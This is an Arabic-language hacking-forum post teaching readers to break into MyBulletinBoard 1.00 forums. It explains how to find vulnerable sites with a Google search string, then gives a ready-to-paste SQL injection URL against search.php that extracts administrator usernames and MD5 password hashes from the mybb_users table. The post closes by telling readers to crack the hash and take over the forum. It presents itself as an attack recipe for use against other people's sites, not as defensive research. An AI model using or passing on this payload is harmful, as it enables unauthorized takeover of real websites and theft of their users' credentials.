السلام عليكم
ثغرة اليوم فى منتديات MyBulletinBoard
لكن بكون الباسورد هاش MD5
يعنى لو مش مستعد للهاش دة يبقى اعمل باك Back :s7: على شان دماغك مش رايقة
بسم الله
ادخل Goolge.com
و ضع هذا الكود Powered by MyBulletinBoard 1.00 Release
هيطلع نتائج كتير مثل جيب دة
اول ما هندخل السيت هيبقى كدة (
http://www.Ar-HaCkEr.com/forum ) بعد المنتدى كلمة forum ضع هذا الكود
كود:
search.php?action=finduser&uid=-1'%20UNION%20SELECT%20uid,uid,uid,uid,uid,uid,uid, uid,uid,uid,uid,uid,uid,uid,uid,username,password% 20FROM%20mybb_users%20where%20usergroup=4
راح يجك هذة الصورة
انتظر ثانية واحد و راح تحصل على الباسورد و اسم الادمن كما يلى
و ألفين مبروووووووك يا نجم
و الان ما عليك بس انك تفك و استمتع بالمنتدى
ملحوظة : ممكن بعد وضع الكود و يحمل الصورة الثانية يدخل على صفحة بيضة يبقى الثغرة مش موجودة بالمنتدى
المصدر ( هنـــــــــا )
http://www.securityfocus.com/archive/1/408624 تحياتى للجميع